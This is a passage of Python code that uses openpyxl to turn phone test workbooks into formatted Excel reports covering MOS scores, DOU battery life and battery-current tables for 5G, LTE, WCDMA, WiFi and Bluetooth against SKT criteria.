                    for i in [5, 6, 7, 8, 12, 13, 17, 18, 19, 20]:
                        sheet_out['A' + str(i)].fill = self.gray_fill
                        sheet_out['B' + str(i)].fill = self.gray_fill

                    for i in [4, 11, 16]:
                        sheet_out['A' + str(i)].fill = self.brown_fill
                        sheet_out['C' + str(i)].fill = self.brown_fill
                        sheet_out['D' + str(i)].fill = self.brown_fill

                self.currentRow = self.currentRow + 1
                self.setPrintText('/s {}번 파일 "주파수동조" 시트 스타일 적용 완료 /e'.format(idx+1))
                # save file
                wb_output.save(self.list_out_files[idx])
        except:
            self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')
            self.end_count = "y"
            self.end_flag.emit()

    # MOS Tab
    def mos_generate_data(self):

        try:
            for idx, item in enumerate(self.list_files):

                wb_input = openpyxl.load_workbook(item, data_only=True)
                wb_output = openpyxl.load_workbook(self.list_out_files[idx])
                list_val = []

                # get data from wb_input
                sheet_in = wb_input['MOS']
                list_val.append(self.check_num(sheet_in['C6'].value))
                list_val.append(self.check_num(sheet_in['D6'].value))
                list_val.append(self.check_num(sheet_in['E6'].value))
                list_val.append(self.check_num(sheet_in['F6'].value))

                # option setting wb_output
                sheet_out = wb_output['MOS']
                # sheet row 1 handle
                sheet_out.merge_cells('A1:D1')
                sheet_out['A1'] = 'MOS 결과'

                # sheet row 2 handle
                sheet_out['A2'] = '- MOS 결과'
                sheet_out['A3'] = '▣ POLQA_48K'

                # 4~6 row
                sheet_out['A4'] = '구분'
                sheet_out['B4'] = '기준'
                sheet_out['C4'] = '측정결과'
                sheet_out['D4'] = '비교'
                sheet_out['A5'] = 'Downlink MOS'
                sheet_out['B5'] = '3.5 이상'
                sheet_out['C5'] = list_val[0]
                # sheet_out['D5'] = self.check_num(abs(round(abs(float(list_val[0])) - 3.5, 2)))
                sheet_out['D5'] = self.cal_comparison(3.5, list_val[0])
                sheet_out['A6'] = 'Uplink MOS'
                sheet_out['B6'] = '3.5 이상'
                sheet_out['C6'] = list_val[1]
                # sheet_out['D6'] = self.check_num(abs(round(abs(float(list_val[1])) - 3.5, 2)))
                sheet_out['D6'] = self.cal_comparison(3.5, list_val[1])

                # sheet row 8 handle
                sheet_out['A8'] = '▣ POLQA_8K'

                # 9~11 row
                sheet_out['A9'] = '구분'
                sheet_out['B9'] = '기준'
                sheet_out['C9'] = '측정결과'
                sheet_out['A10'] = 'Downlink MOS'
                sheet_out['B10'] = '3.0 이상'
                sheet_out['C10'] = list_val[2]
                # sheet_out['D10'] = self.check_num(abs(round(abs(float(list_val[2])) - 3.0, 2)))
                sheet_out['D10'] = self.cal_comparison(3.0, list_val[2])
                sheet_out['A11'] = 'Uplink MOS'
                sheet_out['B11'] = '3.0 이상'
                sheet_out['C11'] = list_val[3]
                # sheet_out['D11'] = self.check_num(abs(round(abs(float(list_val[3])) - 3.0, 2)))
                sheet_out['D11'] = self.cal_comparison(3.0, list_val[3])

                self.setPrintText('/s {}번 파일 "MOS" 데이터 입력 완료 /e'.format(idx+1))

                # set temp data

                if self.opFlag:

                    # all cell alignment adjust
                    for mCell in sheet_out["A1:D11"]:
                        for cell in mCell:
                            cell.alignment = self.general_alignment
                    # top alignment adjust
                    sheet_out['A2'].alignment = self.top_alignment
                    sheet_out['A3'].alignment = self.top_alignment
                    sheet_out['A8'].alignment = self.top_alignment

                    # all cell border adjust
                    for mCell in sheet_out["A4:D6"]:
                        for cell in mCell:
                            cell.border = self.thin_border

                    for mCell in sheet_out["A9:D11"]:
                        for cell in mCell:
                            cell.border = self.thin_border

                    # all cell font adjust
                    for mCell in sheet_out["A2:D11"]:
                        for cell in mCell:
                            cell.font = self.index_font

                    sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')

                    # each column width adjust
                    sheet_cell_list = ['A', 'B', 'C', 'D']
                    sheet_width_list = [25, 15.88, 17, 13.13]

                    for i in range(len(sheet_cell_list)):
                        sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]
                    sheet_out.row_dimensions[1].height = 45

                    # Set Pattern Fill
                    for i in [4, 9]:
                        sheet_out['A' + str(i)].fill = self.brown_fill
                        sheet_out['B' + str(i)].fill = self.brown_fill
                        sheet_out['C' + str(i)].fill = self.brown_fill
                        sheet_out['D' + str(i)].fill = self.brown_fill

                    for i in [5, 6, 10, 11]:
                        sheet_out['A' + str(i)].fill = self.gray_fill
                        sheet_out['B' + str(i)].fill = self.apricot_fill

                self.currentRow = self.currentRow + 1
                self.setPrintText('/s {}번 파일 "MOS" 시트 스타일 적용 완료 /e'.format(idx+1))
                # save file
                wb_output.save(self.list_out_files[idx])
        except:
            self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')
            self.end_count = "y"
            self.end_flag.emit()

    # DOU Tab
    def dou_generate_data(self):

        try:
            for idx, item in enumerate(self.list_files):

                list_input = []
                wb_input = openpyxl.load_workbook(item, data_only=True)
                wb_output = openpyxl.load_workbook(self.list_out_files[idx])
                col_sum = list(range(4, 16))
                col_a = [1, 2, 4, 7, 13, 16, 17]
                col_b = [2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
                col_c = [2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
                col_d = [2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
                col_e = [3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15]
                i_sum = 0.0
                r_sum = 0.0
                t_sum = 0.0

                # get data from wb_input
                sheet_in = wb_input['배터리소모전류(DOU)']
                temp_data = []
                for i in col_a:
                    if i == 1:
                        temp_data.append(str(sheet_in['A' + str(i)].value))
                    else:
                        temp_data.append(str(sheet_in['A' + str(i + 1)].value))
                list_input.append(temp_data)

                temp_data = []
                for i in col_b:
                    temp_data.append(str(sheet_in['B' + str(i + 1)].value))
                list_input.append(temp_data)

                temp_data = []
                for i in col_c:
                    temp_data.append(str(sheet_in['C' + str(i + 1)].value))
                    if i in col_sum:
                        if self.isNumber(sheet_in['C' + str(i + 1)].value):
                            t_sum = t_sum + float(sheet_in['C' + str(i + 1)].value)
                list_input.append(temp_data)

                temp_data = []
                for i in col_d:
                    if i in col_sum:
                        if self.isNumber(sheet_in['D' + str(i + 1)].value):
                            i_sum = i_sum + float(sheet_in['D' + str(i + 1)].value)
                            temp_data.append(round(float(sheet_in['D' + str(i + 1)].value), 1))
                        else:
                            temp_data.append(self.check_empty(sheet_in['D' + str(i + 1)].value))
                    else:
                        temp_data.append(self.check_empty(sheet_in['D' + str(i + 1)].value))
                list_input.append(temp_data)

                temp_data = []
                for i in col_e:
                    if i in col_sum:
                        if self.isNumber(sheet_in['E' + str(i + 1)].value):
                            r_sum = r_sum + float(sheet_in['E' + str(i + 1)].value)
                            temp_data.append(round(float(sheet_in['E' + str(i + 1)].value), 1))
                        else:
                            temp_data.append(self.check_empty(sheet_in['E' + str(i + 1)].value))
                    else:
                        temp_data.append(self.check_empty(sheet_in['E' + str(i + 1)].value))
                list_input.append(temp_data)

                # input the data on output sheet
                sheet_out = wb_output['배터리소모전류(DOU)']

                for idx_2, item2 in enumerate(list_input):

                    if idx_2 == 0:
                        for i in range(len(item2)):
                            sheet_out['A'+str(col_a[i])] = item2[i]
                    elif idx_2 == 1:
                        for i in range(len(item2)):
                            sheet_out['B'+str(col_b[i])] = item2[i]
                    elif idx_2 == 2:
                        for i in range(len(item2)):
                            sheet_out['C'+str(col_c[i])] = item2[i]
                    elif idx_2 == 3:
                        for i in range(len(item2)):
                            sheet_out['D'+str(col_d[i])] = item2[i]
                    else:
                        for i in range(len(item2)):
                            sheet_out['E'+str(col_e[i])] = item2[i]

                # fill rest values
                sheet_out.merge_cells('A1:E1')
                sheet_out.merge_cells('A2:A3')
                sheet_out.merge_cells('B2:B3')
                sheet_out.merge_cells('C2:C3')
                sheet_out.merge_cells('D2:E2')
                sheet_out.merge_cells('A4:A6')
                sheet_out.merge_cells('A7:A12')
                sheet_out.merge_cells('A13:A15')
                sheet_out.merge_cells('A16:B16')
                sheet_out.merge_cells('A17:C17')
                sheet_out.merge_cells('D17:E17')

                sheet_out['A16'] = '소계'
                if str(t_sum) == '0' or str(t_sum) == '0.0':
                    sheet_out['C16'] = ''
                else:
                    sheet_out['C16'] = round(t_sum, 1)

                if str(r_sum) == '0' or str(r_sum) == '0.0':
                    sheet_out['E16'] = ''
                else:
                    sheet_out['E16'] = round(r_sum, 1)

                if str(i_sum) == '0' or str(i_sum) == '0.0':
                    sheet_out['D16'] = ''
                else:
                    sheet_out['D16'] = round(i_sum, 1)

                sheet_out['A17'] = '사용시간'
                # guard: r_sum can be 0.0 when no current figures were summed
                if r_sum:
                    sheet_out['D17'] = str(round(self.battery_spec/r_sum, 2))+"일"
                else:
                    sheet_out['D17'] = ''

                self.setPrintText('/s {}번 파일 "배터리소모전류(DOU)" 데이터 입력 완료 /e'.format(idx+1))

                if self.opFlag:

                    # all cell alignment adjust
                    for mCell in sheet_out["A1:E17"]:
                        for cell in mCell:
                            cell.alignment = self.general_alignment

                    # all cell border adjust
                    for mCell in sheet_out["A2:E17"]:
                        for cell in mCell:
                            cell.border = self.thin_border

                    # all cell font adjust
                    for mCell in sheet_out["A2:E17"]:
                        for cell in mCell:
                            cell.font = self.index_font

                    sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')

                    # each column width adjust
                    sheet_cell_list = ['A', 'B', 'C', 'D', 'E']
                    sheet_width_list = [10.25, 27.38, 15.5, 17, 17]

                    for i in range(len(sheet_cell_list)):
                        sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]
                    sheet_out.row_dimensions[1].height = 45

                    # Set Pattern Fill
                    sheet_out['A2'].fill = self.brown_fill
                    sheet_out['B2'].fill = self.brown_fill
                    sheet_out['C2'].fill = self.brown_fill
                    sheet_out['D2'].fill = self.brown_fill
                    sheet_out['D3'].fill = self.brown_fill
                    sheet_out['E3'].fill = self.brown_fill
                    sheet_out['A16'].fill = self.light_brown_fill
                    sheet_out['C16'].fill = self.light_brown_fill
                    sheet_out['D16'].fill = self.light_brown_fill
                    sheet_out['E16'].fill = self.light_brown_fill
                    sheet_out['A17'].fill = self.brown_fill
                    sheet_out['D17'].fill = self.brown_fill

                    for i in range(4, 16):
                        sheet_out['A' + str(i)].fill = self.gray_fill
                        sheet_out['B' + str(i)].fill = self.gray_fill
                        sheet_out['C' + str(i)].fill = self.gray_fill

                self.currentRow = self.currentRow + 1
                self.setPrintText('/s {}번 파일 "배터리소모전류(DOU)" 시트 스타일 적용 완료 /e'.format(idx+1))
                # save file
                wb_output.save(self.list_out_files[idx])
        except:
            self.setPrintText('/s Error: {}. {}, line: {}'.format(sys.exc_info()[0], sys.exc_info()[1], sys.exc_info()[2].tb_lineno)+' /e')
            self.end_count = "y"
            self.end_flag.emit()

    # 배터리소모전류 Tab
    def bat_generate_data(self):

        try:
            for idx, item in enumerate(self.list_files):

                wb_input = openpyxl.load_workbook(item, data_only=True)
                wb_output = openpyxl.load_workbook(self.list_out_files[idx])
                col_out = ['Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z', 'AA', 'AB']

                # get data from wb_input
                sheet_in = wb_input['배터리소모전류']
                # option setting wb_output
                sheet_out = wb_output['배터리소모전류 세부데이터']

                # sheet row 1 handle
                sheet_out.merge_cells('A1:P1')
                sheet_out['A1'] = '배터리소모전류 결과'
                # sheet row 3~5 handle
                sheet_out['A3'] = '▣ 5G 측정내역'
                sheet_out.merge_cells('A4:A5')
                sheet_out['A4'] = '차수'
                sheet_out.merge_cells('B4:B5')
                sheet_out['B4'] = '시료번호'
                sheet_out.merge_cells('C4:C5')
                sheet_out['C4'] = '배터리용량'
                sheet_out.merge_cells('D4:D5')
                sheet_out['D4'] = '측정채널'
                sheet_out.merge_cells('E4:H4')
                sheet_out['E4'] = sheet_in['E8'].value
                sheet_out.merge_cells('I4:L4')
                sheet_out['I4'] = sheet_in['I8'].value
                sheet_out.merge_cells('M4:P4')
                sheet_out['M4'] = sheet_in['M8'].value

                sheet_out.merge_cells('E5:F5')
                sheet_out['E5'] = sheet_in['E9'].value
                sheet_out.merge_cells('G5:H5')
                sheet_out['G5'] = sheet_in['G9'].value
                sheet_out.merge_cells('I5:J5')
                sheet_out['I5'] = sheet_in['I9'].value
                sheet_out.merge_cells('K5:L5')
                sheet_out['K5'] = sheet_in['K9'].value
                sheet_out.merge_cells('M5:N5')
                sheet_out['M5'] = sheet_in['M9'].value
                sheet_out.merge_cells('O5:P5')
                sheet_out['O5'] = sheet_in['O9'].value

                # sheet row 6~7 handle
                sheet_out.merge_cells('A6:D7')
                sheet_out['A6'] = 'SKT 기준'
                for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']:
                    sheet_out[col + '6'] = sheet_in[col+'10'].value
                    sheet_out[col + '7'] = sheet_in[col+'11'].value

                # sheet row 8~9 handle
                for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']:

                    if col in ['A', 'B', 'C', 'D']:
                        sheet_out[col + '8'] = sheet_in[col + '12'].value
                        sheet_out[col + '9'] = sheet_in[col + '13'].value
                    else:
                        # row 8
                        if self.isNumber(sheet_in[col + '12'].value):
                            sheet_out[col + '8'] = self.check_num(round(float(sheet_in[col + '12'].value), 2))
                        else:
                            sheet_out[col + '8'] = self.check_empty(sheet_in[col + '12'].value)

                        # row 9
                        if self.isNumber(sheet_in[col + '13'].value):
                            sheet_out[col + '9'] = self.check_num(round(float(sheet_in[col + '13'].value), 2))
                        else:
                            sheet_out[col + '9'] = self.check_empty(sheet_in[col + '13'].value)

                # sheet row 10~11 handle
                sheet_out.merge_cells('A10:A11')
                sheet_out['A10'] = '차수'
                sheet_out.merge_cells('B10:B11')
                sheet_out['B10'] = '시료번호'
                sheet_out.merge_cells('C10:C11')
                sheet_out['C10'] = '배터리용량'
                sheet_out.merge_cells('D10:D11')
                sheet_out['D10'] = '측정채널'

                sheet_out.merge_cells('E10:F10')
                sheet_out['E10'] = sheet_in['Q8'].value
                sheet_out.merge_cells('G10:H10')
                sheet_out['G10'] = sheet_in['S8'].value
                sheet_out.merge_cells('I10:J10')
                sheet_out['I10'] = sheet_in['U8'].value
                sheet_out.merge_cells('K10:L10')
                sheet_out['K10'] = sheet_in['W8'].value
                sheet_out.merge_cells('M10:N10')
                sheet_out['M10'] = sheet_in['Y8'].value
                sheet_out.merge_cells('O10:P10')
                sheet_out['O10'] = sheet_in['AA8'].value

                sheet_out.merge_cells('E11:F11')
                sheet_out['E11'] = sheet_in['Q9'].value
                sheet_out.merge_cells('G11:H11')
                sheet_out['G11'] = sheet_in['S9'].value
                sheet_out.merge_cells('I11:J11')
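                # (second 5G block continues: input columns Q..AA map onto output columns E..P)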
                sheet_out['I11'] = sheet_in['U9'].value
                sheet_out.merge_cells('K11:L11')
                sheet_out['K11'] = sheet_in['W9'].value
                sheet_out.merge_cells('M11:N11')
                sheet_out['M11'] = sheet_in['Y9'].value
                sheet_out.merge_cells('O11:P11')
                sheet_out['O11'] = sheet_in['AA9'].value

                # sheet row 12~13 handle
                sheet_out.merge_cells('A12:D13')
                sheet_out['A12'] = 'SKT 기준'

                for i, col in enumerate(['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']):
                    sheet_out[col + '12'] = sheet_in[col_out[i] + '10'].value
                    sheet_out[col + '13'] = sheet_in[col_out[i] + '11'].value

                # sheet row 14~15 handle
                for i, col in enumerate(['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']):

                    if col in ['A', 'B', 'C', 'D']:
                        sheet_out[col + '14'] = sheet_in[col + '12'].value
                        sheet_out[col + '15'] = sheet_in[col + '13'].value
                    else:
                        # row 14
                        if self.isNumber(sheet_in[col_out[i-4] + '12'].value):
                            sheet_out[col + '14'] = self.check_num(round(float(sheet_in[col_out[i-4] + '12'].value), 2))
                        else:
                            sheet_out[col + '14'] = self.check_empty(sheet_in[col_out[i-4] + '12'].value)

                        # row 15
                        if self.isNumber(sheet_in[col_out[i-4] + '13'].value):
                            sheet_out[col + '15'] = self.check_num(round(float(sheet_in[col_out[i-4] + '13'].value), 2))
                        else:
                            sheet_out[col + '15'] = self.check_empty(sheet_in[col_out[i-4] + '13'].value)

                # sheet row 17~19 handle
                sheet_out['A17'] = '▣ LTE 측정내역'
                sheet_out.merge_cells('A18:A19')
                sheet_out['A18'] = '차수'
                sheet_out.merge_cells('B18:B19')
                sheet_out['B18'] = '시료번호'
                sheet_out.merge_cells('C18:C19')
                sheet_out['C18'] = '배터리용량'
                sheet_out.merge_cells('D18:D19')
                sheet_out['D18'] = '측정채널'
                sheet_out.merge_cells('E18:H18')
                sheet_out['E18'] = sheet_in['E16'].value
                sheet_out.merge_cells('I18:L18')
                sheet_out['I18'] = sheet_in['I16'].value
                sheet_out.merge_cells('M18:P18')
                sheet_out['M18'] = sheet_in['M16'].value

                sheet_out.merge_cells('E19:F19')
                sheet_out['E19'] = sheet_in['E17'].value
                sheet_out.merge_cells('G19:H19')
                sheet_out['G19'] = sheet_in['G17'].value
                sheet_out.merge_cells('I19:J19')
                sheet_out['I19'] = sheet_in['I17'].value
                sheet_out.merge_cells('K19:L19')
                sheet_out['K19'] = sheet_in['K17'].value
                sheet_out.merge_cells('M19:N19')
                sheet_out['M19'] = sheet_in['M17'].value
                sheet_out.merge_cells('O19:P19')
                sheet_out['O19'] = sheet_in['O17'].value

                # sheet row 20~21 handle
                sheet_out.merge_cells('A20:D21')
                sheet_out['A20'] = 'SKT 기준'
                for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']:
                    sheet_out[col + '20'] = sheet_in[col+'18'].value
                    sheet_out[col + '21'] = sheet_in[col+'19'].value

                # sheet row 22~23 handle
                for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P']:

                    if col in ['A', 'B', 'C', 'D']:
                        sheet_out[col + '22'] = sheet_in[col + '12'].value
                        sheet_out[col + '23'] = sheet_in[col + '13'].value
                    else:
                        # row 22
                        if self.isNumber(sheet_in[col + '20'].value):
                            sheet_out[col + '22'] = self.check_num(round(float(sheet_in[col + '20'].value), 2))
                        else:
                            sheet_out[col + '22'] = self.check_empty(sheet_in[col + '20'].value)

                        # row 23
                        if self.isNumber(sheet_in[col + '21'].value):
                            sheet_out[col + '23'] = self.check_num(round(float(sheet_in[col + '21'].value), 2))
                        else:
                            sheet_out[col + '23'] = self.check_empty(sheet_in[col + '21'].value)

                # sheet row 24~25 handle
                sheet_out.merge_cells('A24:A25')
                sheet_out['A24'] = '차수'
                sheet_out.merge_cells('B24:B25')
                sheet_out['B24'] = '시료번호'
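                # second LTE table (rows 24~29): header labels repeat; values come from input columns Q..X via col_out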
sheet_out.merge_cells('C24:C25')\n sheet_out['C24'] = '베터리용량'\n sheet_out.merge_cells('D24:D25')\n sheet_out['D24'] = '측정채널'\n\n sheet_out.merge_cells('E24:F24')\n sheet_out['E24'] = sheet_in['Q16'].value\n sheet_out.merge_cells('G24:H24')\n sheet_out['G24'] = sheet_in['S16'].value\n sheet_out.merge_cells('I24:J24')\n sheet_out['I24'] = sheet_in['U16'].value\n sheet_out.merge_cells('K24:L24')\n sheet_out['K24'] = sheet_in['W16'].value\n\n sheet_out.merge_cells('E25:F25')\n sheet_out['E25'] = sheet_in['Q17'].value\n sheet_out.merge_cells('G25:H25')\n sheet_out['G25'] = sheet_in['S17'].value\n sheet_out.merge_cells('I25:J25')\n sheet_out['I25'] = sheet_in['U17'].value\n sheet_out.merge_cells('K25:L25')\n sheet_out['K25'] = sheet_in['W17'].value\n\n # sheet row 26~27 handle\n sheet_out.merge_cells('A26:D27')\n sheet_out['A26'] = 'SKT 기준'\n\n for i, col in enumerate(['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']):\n sheet_out[col + '26'] = sheet_in[col_out[i] + '18'].value\n sheet_out[col + '27'] = sheet_in[col_out[i] + '19'].value\n\n # sheet row 28~29 handle\n for i, col in enumerate(['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']):\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '28'] = sheet_in[col + '12'].value\n sheet_out[col + '29'] = sheet_in[col + '13'].value\n else:\n # row 28\n if self.isNumber(sheet_in[col_out[i-4] + '20'].value):\n sheet_out[col + '28'] = self.check_num(round(float(sheet_in[col_out[i-4] + '20'].value), 2))\n else:\n sheet_out[col + '28'] = self.check_empty(sheet_in[col_out[i-4] + '20'].value)\n # row 29\n if self.isNumber(sheet_in[col_out[i-4] + '21'].value):\n sheet_out[col + '29'] = self.check_num(round(float(sheet_in[col_out[i-4] + '21'].value), 2))\n else:\n sheet_out[col + '29'] = self.check_empty(sheet_in[col_out[i-4] + '21'].value)\n\n\n # sheet row 31~33 handle\n sheet_out['A31'] = '▣ WCDMA 측정내역'\n sheet_out.merge_cells('A32:A33')\n sheet_out['A32'] = '차수'\n sheet_out.merge_cells('B32:B33')\n sheet_out['B32'] = '시료번호'\n sheet_out.merge_cells('C32:C33')\n sheet_out['C32'] = '베터리용량'\n sheet_out.merge_cells('D32:D33')\n sheet_out['D32'] = '측정채널'\n\n sheet_out.merge_cells('E32:F32')\n sheet_out['E32'] = sheet_in['E24'].value\n sheet_out.merge_cells('G32:J32')\n sheet_out['G32'] = sheet_in['G24'].value\n sheet_out.merge_cells('K32:L32')\n sheet_out['K32'] = sheet_in['K24'].value\n\n sheet_out.merge_cells('E33:F33')\n sheet_out['E33'] = sheet_in['E25'].value\n sheet_out.merge_cells('G33:H33')\n sheet_out['G33'] = sheet_in['G25'].value\n sheet_out.merge_cells('I33:J33')\n sheet_out['I33'] = sheet_in['I25'].value\n sheet_out.merge_cells('K33:L33')\n sheet_out['K33'] = sheet_in['K25'].value\n\n # sheet row 34~35 handle\n sheet_out.merge_cells('A34:D35')\n sheet_out['A34'] = 'SKT 기준'\n for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']:\n sheet_out[col + '34'] = sheet_in[col+'26'].value\n sheet_out[col + '35'] = sheet_in[col+'27'].value\n\n # sheet row 36~37 handle\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']:\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '36'] = sheet_in[col + '12'].value\n sheet_out[col + '37'] = sheet_in[col + '13'].value\n else:\n # row 36\n if self.isNumber(sheet_in[col + '28'].value):\n sheet_out[col + '36'] = self.check_num(round(float(sheet_in[col + '28'].value), 2))\n else:\n sheet_out[col + '36'] = self.check_empty(sheet_in[col + '28'].value)\n # row 37\n if self.isNumber(sheet_in[col + '29'].value):\n sheet_out[col + '37'] = self.check_num(round(float(sheet_in[col + '29'].value), 2))\n 
else:\n sheet_out[col + '37'] = self.check_empty(sheet_in[col + '29'].value)\n\n # sheet row 39~41 handle\n sheet_out['A39'] = '▣ WiFi 측정내역'\n sheet_out.merge_cells('A40:A41')\n sheet_out['A40'] = '차수'\n sheet_out.merge_cells('B40:B41')\n sheet_out['B40'] = '시료번호'\n sheet_out.merge_cells('C40:C41')\n sheet_out['C40'] = '베터리용량'\n sheet_out.merge_cells('D40:D41')\n sheet_out['D40'] = '측정채널'\n\n sheet_out.merge_cells('E40:F40')\n sheet_out['E40'] = sheet_in['E32'].value\n sheet_out.merge_cells('G40:H40')\n sheet_out['G40'] = sheet_in['G32'].value\n sheet_out.merge_cells('I40:J40')\n sheet_out['I40'] = sheet_in['I32'].value\n sheet_out.merge_cells('K40:L40')\n sheet_out['K40'] = sheet_in['K32'].value\n sheet_out.merge_cells('M40:N40')\n sheet_out['M40'] = sheet_in['M32'].value\n\n sheet_out.merge_cells('E41:F41')\n sheet_out['E41'] = sheet_in['E33'].value\n sheet_out.merge_cells('G41:H41')\n sheet_out['G41'] = sheet_in['G33'].value\n sheet_out.merge_cells('I41:J41')\n sheet_out['I41'] = sheet_in['I33'].value\n sheet_out.merge_cells('K41:L41')\n sheet_out['K41'] = sheet_in['K33'].value\n sheet_out.merge_cells('M41:N41')\n sheet_out['M41'] = sheet_in['M33'].value\n\n # sheet row 42~43 handle\n sheet_out.merge_cells('A42:D43')\n sheet_out['A42'] = 'SKT 기준'\n for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n sheet_out[col + '42'] = sheet_in[col+'34'].value\n sheet_out[col + '43'] = sheet_in[col+'35'].value\n\n # sheet row 44~45 handle\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '44'] = sheet_in[col + '12'].value\n sheet_out[col + '45'] = sheet_in[col + '13'].value\n else:\n # row 44\n if self.isNumber(sheet_in[col + '36'].value):\n sheet_out[col + '44'] = self.check_num(round(float(sheet_in[col + '36'].value), 2))\n else:\n sheet_out[col + '44'] = self.check_empty(sheet_in[col + '36'].value)\n # row 45\n if self.isNumber(sheet_in[col + '37'].value):\n sheet_out[col + '45'] = self.check_num(round(float(sheet_in[col + '37'].value), 2))\n else:\n sheet_out[col + '45'] = self.check_empty(sheet_in[col + '37'].value)\n\n # sheet row 47~49 handle\n sheet_out['A47'] = '▣ BlueTooth 측정내역'\n sheet_out.merge_cells('A48:A49')\n sheet_out['A48'] = '차수'\n sheet_out.merge_cells('B48:B49')\n sheet_out['B48'] = '시료번호'\n sheet_out.merge_cells('C48:C49')\n sheet_out['C48'] = '베터리용량'\n sheet_out.merge_cells('D48:D49')\n sheet_out['D48'] = '측정채널'\n sheet_out.merge_cells('E48:N48')\n sheet_out['E48'] = sheet_in['E40'].value\n\n sheet_out.merge_cells('E49:F49')\n sheet_out['E49'] = sheet_in['E41'].value\n sheet_out.merge_cells('G49:H49')\n sheet_out['G49'] = sheet_in['G41'].value\n sheet_out.merge_cells('I49:J49')\n sheet_out['I49'] = sheet_in['I41'].value\n sheet_out.merge_cells('K49:L49')\n sheet_out['K49'] = sheet_in['K41'].value\n sheet_out.merge_cells('M49:N49')\n sheet_out['M49'] = sheet_in['M41'].value\n\n # sheet row 50~51 handle\n sheet_out.merge_cells('A50:D51')\n sheet_out['A50'] = 'SKT 기준'\n\n for col in ['E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n sheet_out[col + '50'] = sheet_in[col+'42'].value\n sheet_out[col + '51'] = sheet_in[col+'43'].value\n\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N']:\n\n # sheet row 52~53 handle\n if col in ['A', 'B', 'C', 'D']:\n sheet_out[col + '52'] = sheet_in[col + '12'].value\n sheet_out[col + '53'] = sheet_in[col + '13'].value\n else:\n # row 52\n if self.isNumber(sheet_in[col + '44'].value):\n sheet_out[col + '52'] = 
self.check_num(round(float(sheet_in[col + '44'].value), 2))\n else:\n sheet_out[col + '52'] = self.check_empty(sheet_in[col + '44'].value)\n # row 53\n if self.isNumber(sheet_in[col + '45'].value):\n sheet_out[col + '53'] = self.check_num(round(float(sheet_in[col + '45'].value), 2))\n else:\n sheet_out[col + '53'] = self.check_empty(sheet_in[col + '45'].value)\n\n self.setPrintText('/s {}번 파일 \"배터리소모전류 세부데이터\" 테이터 입력 완료 /e'.format(idx+1))\n\n # set temp data\n if self.opFlag:\n\n # all cell alignment adjust\n for mCell in sheet_out[\"A1:Z53\"]:\n for cell in mCell:\n cell.alignment = self.general_alignment\n # top alignment adjust\n sheet_out['A3'].alignment = self.top_alignment\n sheet_out['A17'].alignment = self.top_alignment\n sheet_out['A31'].alignment = self.top_alignment\n sheet_out['A39'].alignment = self.top_alignment\n sheet_out['A47'].alignment = self.top_alignment\n\n # all cell border adjust\n for mCell in sheet_out[\"A4:P15\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A18:P23\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A24:L29\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A32:L37\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A40:N45\"]:\n for cell in mCell:\n cell.border = self.thin_border\n for mCell in sheet_out[\"A48:N53\"]:\n for cell in mCell:\n cell.border = self.thin_border\n\n # all cell font adjust\n for mCell in sheet_out[\"A3:P53\"]:\n for cell in mCell:\n cell.font = self.index_font\n\n sheet_out['A1'].font = Font(name='맑은 고딕', size=22, bold=True, color='2B2B2B')\n\n # each column width adjust\n sheet_cell_list = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N',\n 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n sheet_width_list = [29.88, 11.38, 11.38, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11,\n 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11, 11]\n\n for i in range(len(sheet_cell_list)):\n sheet_out.column_dimensions[sheet_cell_list[i]].width = sheet_width_list[i]\n\n sheet_out.row_dimensions[1].height = 45\n\n # Set Pattern Fill\n for col in ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 